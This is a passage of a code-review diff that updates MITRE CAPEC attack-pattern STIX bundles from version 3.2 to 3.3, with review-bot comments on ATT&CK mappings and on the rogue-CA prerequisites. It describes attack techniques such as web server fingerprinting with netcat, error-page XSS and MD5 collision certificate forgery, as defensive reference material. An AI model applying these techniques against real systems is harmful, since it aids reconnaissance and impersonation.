"\n <xhtml:p>An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from Apache 1.3.23</xhtml:div>$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1</xhtml:div>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from IIS 5.0</xhtml:div>$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133</xhtml:div>\n <xhtml:p>[R.170.2]</xhtml:p>\n "
|
||||
"\n <xhtml:p>An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from Apache 1.3.23</xhtml:div>$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1</xhtml:div>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from IIS 5.0</xhtml:div>$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133</xhtml:div>\n <xhtml:p>[REF-37]</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Request fingerprinting: </b>Use automated tools or send web server specific commands to web server and wait for server's response.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use automated tools or send web server specific commands to web server and then receive server's response.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Increase the accuracy of server fingerprinting of Web servers: </b>Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.</td></tr><tr><td>Send bad requests or requests of nonexistent pages to the server.</td></tr><tr><td>Attacker takes existing automated tools to recognize the type and the version of the web server in use.</td></tr></tbody></table><li> <p> <b>Identify Web Application Software: </b>After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.</td></tr><tr><td>Examine the HTTP Response Headers. This may leak information about software signatures</td></tr><tr><td>Examine Cookies that may contain server's software information.</td></tr><tr><td>Check error pages.</td></tr></tbody></table><li> <p> <b>Identify Backend Database Version: </b>Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. 
Some database API such as ODBC will show a database type as part of the driver information when reporting an error.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use tools to send bogus SQL query to the server and check error pages.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."
|
||||
@@ -71,7 +72,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--cee4d34c-12b1-4e68-b3ce-c1b84cb4100d",
|
||||
"id": "bundle--b6e48eea-3ae7-4430-93d7-24a94d522138",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -27,7 +27,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1d2193e3-df73-42ae-8385-11452a15f086",
|
||||
"id": "bundle--fbca2551-1e75-4c58-bec8-1b25227034d2",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -40,7 +40,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--53e251a0-36aa-4fdb-a046-87778cc9cb29",
|
||||
"id": "bundle--c34e191f-57d2-4cce-893d-30f57771d35e",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2017-08-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "XSS Targeting Error Pages",
|
||||
"description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.",
|
||||
"external_references": [
|
||||
@@ -36,7 +36,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--92165db0-714f-4837-bb68-dde8b98f8afe",
|
||||
"id": "bundle--c8ecfeff-77e7-4f61-8d88-f277b1b375a7",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--9b8ef465-d059-4c43-be6a-ee9ab01c6f26",
|
||||
"id": "bundle--c7a81ec0-4083-4dcc-a639-e0a076f4fd81",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -34,7 +34,7 @@
|
||||
"Medium": "The attacker must know how to make use of these smudges."
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--2f38aba2-58ba-4f5b-9b01-057709f4401a",
|
||||
"id": "bundle--b0234237-a211-46ff-b8ae-cb51f6e4e416",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -74,7 +74,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1e7d4b4f-be19-45e7-8aa2-b0a2c3975f0d",
|
||||
"id": "bundle--461a0911-1a75-44a8-a3ed-7f139b82235f",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -49,7 +49,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--b896226c-4463-4f73-8553-8ac21a55a8c7",
|
||||
"id": "bundle--230981d4-9689-4189-b6ba-e6f15861a5a6",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -40,7 +40,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--30a247c8-c7c4-4875-bcad-e445c3f60857",
|
||||
"id": "bundle--f41a989c-004c-4b6b-acdf-a9b29f8b9bca",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Meta",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--b8d60558-a2e5-4def-8008-5773353c0192",
|
||||
"id": "bundle--b2eb0d0f-2b3a-4959-91ee-1982f7b1164c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -73,7 +73,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--5d2aea5e-4ac7-425d-b2f7-9a653851bb93",
|
||||
"id": "bundle--22197eac-5479-4bd3-a044-9341bdb68dff",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -41,7 +41,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--410a17f9-d14d-4c55-a425-bc7b5ec06dc1",
|
||||
"id": "bundle--14a2800f-1ae8-45b1-af6b-46e6928bf7ba",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Modification During Manufacture",
|
||||
"description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.",
|
||||
"external_references": [
|
||||
@@ -17,6 +17,24 @@
|
||||
"url": "https://capec.mitre.org/data/definitions/438.html",
|
||||
"external_id": "CAPEC-438"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Supply Chain Compromise:Compromise Software Dependencies and Development Tools",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1195/001",
|
||||
"external_id": "T1195.001"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Supply Chain Compromise:Compromise Software Supply Chain",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1195/002",
|
||||
"external_id": "T1195.002"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Supply Chain Compromise:Compromise Hardware Supply Chain",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1195/003",
|
||||
"external_id": "T1195.003"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)",
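Review bot: The three ATT&CK references added in this hunk use `"source_name": "ATTACK"` together with the legacy `https://attack.mitre.org/wiki/Technique/T1195/001` URL form; as far as I recall ATT&CK's own STIX content identifies techniques with `source_name: "mitre-attack"` and serves them at `https://attack.mitre.org/techniques/T1195/001/`, so tooling that joins CAPEC and ATT&CK objects on source_name plus external_id will not match these entries without a translation step. If `ATTACK` is a deliberate CAPEC-wide convention it should be applied consistently in every bundle of this release and stated in the release notes, and the `/wiki/Technique/` path is worth checking against the live site because that scheme predates sub-technique identifiers. The description strings also use a bare colon (`Supply Chain Compromise:Compromise Hardware Supply Chain`) where ATT&CK renders the pair as `Parent: Sub-technique`; a consistent separator keeps the strings greppable.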
|
||||
@@ -43,7 +61,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Meta",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--5d4c48ac-e10e-46b0-9ccd-346b31e4711f",
|
||||
"id": "bundle--482a2dc5-1998-42be-8a15-2168de00ffa5",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Creating a Rogue Certification Authority Certificate",
|
||||
"description": "An adversary exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the \"to be signed\" part. The adversary specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The adversary then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key. An adversary then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the adversary and of course any certificates that it signs. So the adversary is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).",
|
||||
"description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate a certificate signing request (CSR) that contains collision blocks in the \"to be signed\" part. The adversary specially crafts two different, but valid X.509 certificates that when hashed with a non-collision resistant hashing algorithm would yield the same value. The adversary then sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key. An adversary then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and of course any certificates that it signs. So the adversary is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -32,27 +32,57 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/290.html",
|
||||
"external_id": "CWE-290"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Subvert Trust Controls:Install Root Certificate",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1553/004",
|
||||
"external_id": "T1553.004"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org",
|
||||
"url": "http://www.phreedom.org/research/rogue-ca/",
|
||||
"external_id": "REF-395"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12",
|
||||
"url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref",
|
||||
"external_id": "REF-587"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_consequences": {
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">MD5 Collisions</xhtml:div>\n <xhtml:p>The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2004-2761",
|
||||
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">SHA1 Collisions</xhtml:div>\n <xhtml:p>The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2005-4900",
|
||||
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">PKI Infrastructure vulnerabilities</xhtml:div>\n <xhtml:p>Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_likelihood_of_attack": "Medium",
|
||||
"x_capec_prerequisites": [
|
||||
"Certification Authority is using the MD5 hash function to generate the certificate hash to be signed"
|
||||
"Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed"
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance",
|
||||
"A valid certificate request and a malicious certificate request with identical hash values"
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"High": "An attacker must be able to craft two X.509 certificates that produce the same MD5 hash",
|
||||
"High": "An attacker must be able to craft two X.509 certificates that produce the same hash value",
|
||||
"Medium": "Knowledge needed to set up a certification authority"
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
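Review bot: The rewritten `x_capec_prerequisites` entry names only a hash with weak collision resistance, but the attack as described (the colliding certificate pair is computed before the CSR is submitted) also requires the adversary to predict every field the CA itself inserts into the to-be-signed structure, notably the serial number and validity period; REF-395 documents exactly that dependency on sequential serial numbers and predictable issuance timestamps. I would add a second prerequisite: `"The fields the Certification Authority inserts into the to-be-signed certificate (serial number, validity period) are predictable, since the colliding certificate pair must be computed before the CSR is submitted"`. That in turn makes randomized serial numbers, which the CA/Browser Forum baseline has required for some years, a mitigation worth naming alongside retiring MD5 and SHA-1. The new example-instance text has two typos as well: `Research has show` should read `Research has shown`, and `for generated MD5 collisions` should read `for generating MD5 collisions`.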
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--4ca02a6b-aa60-42bd-a7bc-576d2fd70d27",
|
||||
"id": "bundle--ccd03264-cdc7-4672-915a-62f083b0ffcd",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -38,7 +38,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ccfd3779-69a4-40a2-be70-ebc86083d716",
|
||||
"id": "bundle--8a9ce915-cf0d-418c-9ffb-1986601ff7ef",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -46,7 +46,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--d7c2975b-595d-434f-8365-2a8d43ed0fa7",
|
||||
"id": "bundle--ca81cd94-97b9-4563-b2a2-ae2689e5b981",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Modify Existing Service",
|
||||
"description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.",
|
||||
"external_references": [
|
||||
@@ -26,6 +26,36 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Create or Modify System Process:Systemd Service",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1543/002",
|
||||
"external_id": "T1543.002"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Create or Modify System Process:Windows Service",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1543/003",
|
||||
"external_id": "T1543.003"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Create or Modify System Process:Launch Daemon",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1543/004",
|
||||
"external_id": "T1543.004"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "System Services:Launchctl",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1569/001",
|
||||
"external_id": "T1569.001"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "System Services:Service Execution",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1569/002",
|
||||
"external_id": "T1569.002"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
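Review bot: The two `T1569` references added at the end of the block (System Services: Launchctl and Service Execution) describe ATT&CK's Execution tactic — running a payload through the service manager — rather than altering an existing service definition, which is what this pattern's description and the `T1543` persistence sub-techniques cover, so the mapping looks over-broad. Unless CAPEC intends "related technique" to include execution-via-service, I would drop those two entries or record the rationale in the pattern's notes, since an over-broad mapping degrades any CAPEC-to-ATT&CK pivot used in detection engineering. The new URLs use the legacy `/wiki/Technique/...` path; verify they still resolve, as the current canonical form is `https://attack.mitre.org/techniques/T1543/002/`.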
|
||||
@@ -33,7 +63,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--9eb608d6-e404-4d8c-9a44-d64605e67f63",
|
||||
"id": "bundle--b85333a9-2d83-44e8-a75e-d7f93ad0e17a",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Collect Data from Screen Capture",
|
||||
"description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,12 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/267.html",
|
||||
"external_id": "CWE-267"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Screen Capture",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1113",
|
||||
"external_id": "T1113"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -44,7 +50,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--394e5612-6bf2-4297-bcd3-d467b51f5f1e",
|
||||
"id": "bundle--0de78195-7ce8-430b-ba5d-5c7d93ffdc5c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Force the System to Reset Values",
|
||||
"description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,11 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/306.html",
|
||||
"external_id": "CWE-306"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1232.html",
|
||||
"external_id": "CWE-1232"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -36,7 +41,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
